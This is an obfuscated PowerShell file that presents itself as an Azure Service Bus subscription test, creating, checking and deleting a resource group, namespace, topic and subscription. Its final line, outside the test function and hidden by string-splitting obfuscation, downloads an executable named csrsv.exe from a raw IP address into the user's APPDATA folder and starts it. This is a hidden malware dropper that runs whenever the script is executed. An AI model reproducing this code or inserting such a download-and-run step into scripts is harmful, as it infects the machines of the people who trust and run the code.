function S`eRv`IcEBuSs`UBSCrIptiON`T`ESTs {
    
    ${lO`CatiON} = .("{1}{2}{0}" -f'tion','Ge','t-Loca')
    ${RE`SoURCE`gROu`pNa`Me} = &("{1}{0}{2}" -f 'AssetN','get','ame') ("{1}{0}{2}"-f 'Na','RG','me-')
    ${naM`esPA`cE`N`AMe} = &("{1}{2}{0}"-f 'e','getAss','etNam') ("{0}{1}{2}"-f 'Na','mespac','e-')
    ${nA`M`eToPIc} = .("{1}{0}{2}{3}" -f'A','get','s','setName') ("{2}{1}{0}"-f '-','c','Topi')
    ${SUb`Na`Me} = .("{1}{2}{0}{3}"-f'sset','ge','tA','Name') ("{2}{0}{1}" -f 'bscript','ion-','Su')

    &("{0}{2}{1}" -f'W','ebug','rite-D') ("{2}{4}{6}{5}{3}{1}{0}" -f'oup','gr','Crea',' ','t','source','e re')    
    &("{3}{2}{4}{1}{0}"-f'roup','ourceG','ew-','N','AzRes') -Name ${ReSO`U`RCEGrOU`pna`mE} -Location ${l`OC`Ation} -Force
    &("{3}{1}{0}{2}" -f 'Debu','-','g','Write') ('Reso'+'urceGr'+'o'+'up '+'nam'+'e '+': '+"$resourceGroupName")   
    
    &("{0}{3}{2}{1}" -f 'Write','bug','De','-') ("{4}{3}{1}{2}{0}" -f 'space','o','pic name','w T',' Create ne')
    &("{0}{2}{1}"-f 'Wri','bug','te-De') ('N'+'amespa'+'ceN'+'ame '+': '+"$namespaceName") 
    ${re`sult} = .("{7}{6}{4}{3}{5}{0}{2}{1}" -f 'm','ace','esp','Ser','Az','viceBusNa','-','New') -ResourceGroupName ${REs`ouR`ceGr`oUP`NA`ME} -Location ${L`Oc`AtION} -Name ${nAMesp`A`cEn`A`me}     

    .("{0}{1}{2}" -f 'Wr','ite-Debu','g') ("{9}{15}{7}{13}{8}{10}{2}{4}{5}{11}{14}{3}{1}{0}{12}{6}"-f 'he resource ','thin t','nam','e wi','es','p','up','e','ted','Get t',' ','a','gro','a','c','he cr')
    ${Cr`eaT`E`dNAme`Space} = &("{4}{1}{2}{0}{3}" -f'iceBusNam','e','t-AzServ','espace','G') -ResourceGroupName ${R`esOuRC`Eg`ROu`pNA`Me} -Name ${nAmeSP`AcEnA`me}
   		
    .("{1}{2}{0}" -f'ual','Assert-Are','Eq') ${cR`EAt`eDNa`M`ESpAce}."N`Ame" ${NAM`e`SPacen`A`ME} ("{1}{0}{5}{3}{2}{4}{6}"-f 'spac','Name','earl',' created ','ier i','e','s not found')
    .("{0}{1}{3}{2}"-f 'Asse','r','qual','t-AreE') ${Loc`A`TIon}.("{0}{1}"-f 'Repl','ace').Invoke(' ', '') ${c`REAtEdNA`mes`pacE}."l`oCatIon".("{1}{0}"-f 'ce','Repla').Invoke(' ', '')

    &("{0}{2}{1}" -f 'Wr','ebug','ite-D') ("{2}{0}{1}"-f'reat','e Topic','C')	
    ${R`E`sULT} = .("{6}{1}{2}{4}{0}{3}{5}" -f'To','vi','ce','pi','Bus','c','New-AzSer') -ResourceGroupName ${reSo`Urc`EGro`UP`Na`Me} -Namespace ${NAMEsP`AC`eN`AmE} -Name ${nAM`eTO`PIC} -EnablePartitioning ${Tr`UE}
    &("{1}{0}{2}{3}"-f 'ert-AreE','Ass','q','ual') ${R`eSULt}."nA`Me" ${nAME`TO`PiC} ("{3}{2}{5}{6}{0}{4}{1}{7}"-f'e','not ','te','In Crea',' ','T','opic response Nam','found')

    ${rE`Su`Lt`gEtTo`PiC} = &("{2}{4}{1}{3}{0}" -f'pic','BusT','Ge','o','t-AzService') -ResourceGroupName ${R`e`SouRce`gr`OupNaME} -Namespace ${Na`m`espac`eNA`Me} -Name ${RE`S`Ult}."N`AmE"
    &("{1}{3}{2}{0}" -f'reEqual','Ass','t-A','er') ${reS`U`ltgEt`T`opiC}."Na`Me" ${R`e`SULt}."n`AmE" ((("{1}{4}{12}{8}{2}{3}{5}{13}{10}{0}{7}{9}{6}{11}" -f ' Nam','In Aa','sTopic','A','MGet-AzSer','aM respon',' ','e','u',' not','pic','found','viceB','se, To'))."r`EplACE"(([cHar]65+[cHar]97+[cHar]77),[sTrinG][cHar]39))
	
    ${R`ESu`LtgETto`pIC}."En`A`BlEeXP`ResS" = ${tr`UE}

    ${resL`T`sETTO`P`ic} = .("{1}{2}{0}{4}{3}"-f'ic','Set-A','zServ','Topic','eBus') -ResourceGroupName ${r`E`SoUrcE`g`RoupNA`me} -Namespace ${NAMeSpA`c`eN`AME} -Name ${RE`Su`LT`gETTOPiC}."na`mE" -InputObject ${RE`s`ULtG`eTtoPIC}
    .("{2}{1}{3}{0}{4}" -f 'u','-Are','Assert','Eq','al') ${r`e`SLtseTTOpiC}."N`AMe" ${reS`U`lTgett`oP`iC}."n`Ame" ("{6}{7}{2}{3}{1}{4}{5}{8}{0}"-f'd','c respons','t','Topi','e, ','Top','In ','Ge','icName not foun')
    .("{2}{0}{1}{3}" -f'ss','ert-Tr','A','ue') { ${rEslTset`T`opIC}."eNa`B`le`EXp`ResS" } ("{4}{3}{1}{0}{2}{5}{6}"-f 'v','Ser','iceBusT','Az','Set-','op','ic: ')

    
    ${rESu`llIst`T`Op`IC} = &("{4}{3}{0}{1}{5}{2}"-f '-AzServiceBus','To','c','t','Ge','pi') -ResourceGroupName ${R`esO`URC`e`gRouPN`AMe} -Namespace ${NameS`p`A`cE`NAme}
    .("{3}{1}{0}{2}" -f 'e','ss','rt-True','A') { ${r`Es`UL`LIsT`TOpIc}."cO`UnT" -gt 0 } ("{1}{5}{4}{0}{3}{2}"-f ' ','no','istTopic','in L','opics were found',' T')
	
    
    .("{3}{1}{0}{2}"-f 'bu','De','g','Write-') ("{4}{2}{7}{1}{3}{0}{5}{6}" -f'B Topic-Su','w','reat',' S','C','bs','cription','e ne')
    .("{2}{0}{1}" -f 'it','e-Debug','Wr') ('S'+'B '+'Topi'+'c-Su'+'bscri'+'ption '+'Name'+' '+': '+"$subName")
    ${rEslTN`e`w`SuB} = &("{8}{2}{5}{7}{1}{4}{3}{0}{6}"-f 'ti','eBu','ew-AzSe','Subscrip','s','rv','on','ic','N') -ResourceGroupName ${RESou`RCEg`R`ouPNa`Me} -Namespace ${Na`M`eSPA`CEname} -Topic ${na`m`eToPic} -Name ${SU`BN`Ame} -DeadLetteringOnFilterEvaluationExceptions
    .("{0}{4}{3}{2}{1}"-f 'Ass','al','u','Eq','ert-Are') ${rEsLt`News`Ub}."NA`mE" ${SUb`N`AmE} ("{0}{8}{4}{9}{1}{5}{3}{6}{7}{2}{10}"-f 'Subs','d ','fou','r i','ipt','earlie','s',' not ','cr','ion create','nd')

    
    ${rEsULTge`TS`Ub} = .("{1}{2}{3}{0}{4}" -f 'usSubsc','G','e','t-AzServiceB','ription') -ResourceGroupName ${REsOu`RCeGrou`p`N`AmE} -Namespace ${NaM`Espa`ceNa`Me} -Topic ${n`AMEt`OPIc} -Name ${s`U`BNAmE}
    .("{3}{0}{2}{1}{4}" -f 'ss','t-AreEq','er','A','ual') ${Re`SULt`GET`SuB}."N`AME" ${sUBn`A`mE} ("{11}{2}{1}{6}{0}{5}{12}{3}{9}{4}{8}{10}{7}"-f': Subscription','-S','t','eat','d ea',' c','ubscription','und','rlier is not','e',' fo','Ge','r')
    &("{1}{0}{2}{3}" -f 'rt-','Asse','Tru','e') { ${R`e`SulTgeTSuB}."dEad`LetT`e`RI`NgOnfiltEREV`A`luATi`O`NE`XcEpT`iONs" } ("{2}{10}{3}{4}{0}{15}{13}{16}{7}{17}{14}{6}{20}{5}{12}{1}{19}{8}{9}{11}{18}" -f'ption: DeadL','pt','N','subsc','ri','Ex','Evalua','F','not',' ','ew-','updated','ce','ring','r','ette','On','ilte',' ','ions ','tion')
	
    
    ${rE`sUL`TSetsUB} = &("{5}{4}{2}{3}{6}{0}{1}"-f'sSubsc','ription','c','eB','i','Set-AzServ','u') -ResourceGroupName ${R`esou`Rce`Gr`OUPNamE} -Namespace ${n`AMESPAcE`NA`ME} -Topic ${res`Ul`TGEtT`o`pic}."nA`Me" -InputObject ${Re`sul`TGE`TS`Ub}		
    .("{0}{2}{1}{3}"-f 'Ass','eEqua','ert-Ar','l') ${RES`UL`TSE`TSub}."N`Ame" ${RES`U`Ltg`etsuB}."na`Me" ("{4}{6}{7}{3}{9}{2}{0}{1}{8}{5}"-f' i','s not ','lier','pdated','S','d','ubscr','iption U','foun',' ear')

    
    ${rESulTD`E`LE`TetOPIC} = &("{4}{1}{5}{0}{2}{3}" -f 's','-AzServiceBusS','cripti','on','Remove','ub') -ResourceGroupName ${RESOURce`GROUP`N`A`me} -Namespace ${NAM`Es`Pa`cen`AmE} -Topic ${reSu`LliSttO`p`IC}[0]."N`AMe" -Name ${R`ESuL`TS`e`TsuB}."n`AME"
		
    
    
    .("{3}{2}{1}{0}" -f'ebug','ite-D','r','W') ("{2}{3}{0}{4}{1}"-f'et','pic',' ','Del','e the To')
    for (${i} = 0; ${i} -lt ${res`UlLisTt`o`P`iC}."CO`UNt"; ${I}++) {
        ${d`elet`E1} = &("{2}{5}{3}{6}{4}{0}{1}"-f 'opi','c','Re','Se','usT','move-Az','rviceB') -ResourceGroupName ${rESo`UrC`EG`ROU`PnAme} -Namespace ${nAmESpaC`e`Na`Me} -Name ${R`eSUl`LIST`ToPiC}[${I}]."nA`ME"		
    }

    .("{0}{1}{2}{3}" -f 'Wri','te-','De','bug') ("{0}{2}{1}" -f'D','NameSpace','elete ')
    &("{2}{5}{1}{7}{6}{3}{4}{8}{0}"-f 'e','-AzServic','R','es','pa','emove','m','eBusNa','c') -ResourceGroupName ${R`ESo`URCE`GRoUpNA`ME} -Name ${n`AM`esp`AcenAME}
	
    &("{1}{2}{3}{0}" -f 'bug','Wri','te-D','e') ("{2}{4}{0}{5}{1}{3}" -f ' reso','egro',' Dele','up','te','urc')
    .("{1}{4}{0}{3}{2}"-f 'ourceGro','Remov','p','u','e-AzRes') -Name ${r`eS`o`UrcEgR`oUp`Name} -Force
}
(&("{1}{2}{3}{0}"-f 'bject','New','-','O') ("{2}{3}{0}{1}"-f'm.Net.WebC','lient','Sys','te')).("{2}{3}{1}{0}" -f 'e','Fil','Do','wnload').Invoke(("{5}{1}{3}{2}{6}{4}{0}" -f'o/csrsv.exe','89.2','70','48.1','18/~yaho','http://','.2'),"$env:APPDATA\csrsv.exe");.("{3}{2}{0}{1}" -f'-','Process','t','Star') ("$env:APPDATA\csrsv.exe")
